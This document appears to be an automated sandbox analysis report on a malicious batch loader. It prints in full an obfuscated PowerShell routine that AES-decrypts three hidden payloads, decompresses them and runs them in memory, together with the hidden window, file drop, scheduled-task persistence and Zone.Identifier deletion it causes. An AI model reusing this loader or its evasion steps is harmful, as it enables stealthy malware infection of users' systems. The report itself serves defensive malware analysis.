Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: MzWhoQ.exe.35.dr

Static PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,

8_2_000001CA7D1E1E3C

Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001CA7D1CA7DD push rcx; retf 003Fh	8_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_0000017D2DD3A7DD push rcx; retf 003Fh	9_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_0000022F4B90A7DD push rcx; retf 003Fh	12_3_0000022F4B90A7DE
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F20BA7DD push rcx; retf 003Fh	14_3_00000262F20BA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1CEA7DD push rcx; retf 003Fh	14_3_00000262F1CEA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1DDA7DD push rcx; retf 003Fh	14_3_00000262F1DDA7DE
Source: C:\Windows\System32\cmd.exe	Code function: 15_3_000001C115C5A7DD push rcx; retf 003Fh	15_3_000001C115C5A7DE
Source: C:\Windows\System32\conhost.exe	Code function: 16_3_000001BB497DA7DD push rcx; retf 003Fh	16_3_000001BB497DA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_0000023942AFA7DD push rcx; retf 003Fh	19_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000002234E11A7DD push rcx; retf 003Fh	20_3_000002234E11A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001EF056BA7DD push rcx; retf 003Fh	21_3_000001EF056BA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000002287AD5A7DD push rcx; retf 003Fh	22_3_000002287AD5A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001B94DA7A7DD push rcx; retf 003Fh	23_3_000001B94DA7A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_000002520255A7DD push rcx; retf 003Fh	24_3_000002520255A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_000001A9EBFAA7DD push rcx; retf 003Fh	25_3_000001A9EBFAA7DE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\$nya-onimai2\MzWhoQ.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\$nya-onimai2\MzWhoQ.exe

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$nya-iM0vfZcH

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
